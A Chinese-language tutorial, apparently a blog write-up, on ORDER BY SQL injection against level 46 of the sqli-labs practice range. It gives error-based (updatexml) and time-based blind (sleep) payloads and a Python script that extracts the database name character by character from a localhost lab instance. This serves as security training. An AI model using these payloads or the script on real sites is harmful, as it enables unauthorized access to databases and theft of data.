本文介绍了在sqli-lab的第46关中,如何利用orderby注入技术进行排序操作,进而实现报错注入和盲注,最终通过Python脚本自动化提取数据库名称的过程。
sqli-lab靶场的46关是需要使用order by注入的
通过页面提示我们可以给sort传入一个值,那么尝试传入id:
可以看到是基于id排序的结果显示了出来
那么我们可以尝试闭合一下看是否存在报错注入
可以看到是报错了,但是当我们想要尝试进行联合查询时却发现是不行的
因此这里可以考虑报错注入:
payload:
?sort=updatexml(1,concat(0x5e,database(),0x5e),3)--+ 
可以看到利用报错注入成功的注入出了数据库名称
也可以使用盲注:
payload:
?sort=If(length(database())>3,sleep(1),1)--+
就这样不断的变换长度就可以判断出数据库的长度,然后再分别注入出数据库名称,后面的数据都可以使用这种方式注入出,当然也可以使用脚本来提高效率:
python脚本
import requests
from urllib.parse import urlencode
from bs4 import BeautifulSoup
url1="http://127.0.0.1/sqli-labs/Less-46/index.php"
def orderby_inject_database(url1):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
res = {"sort": payload}
r = requests.get(url1, params=res)
# if 'You are in...........' in r.text:
html = r.text
soup = BeautifulSoup(html,'html.parser')
getUsername = soup.find_all('td')[1].text
if getUsername == "admin3":
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
orderby_inject_database(url1)
注:使用该脚本需要将数据库的值和url修改为自己的
运行结果:
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
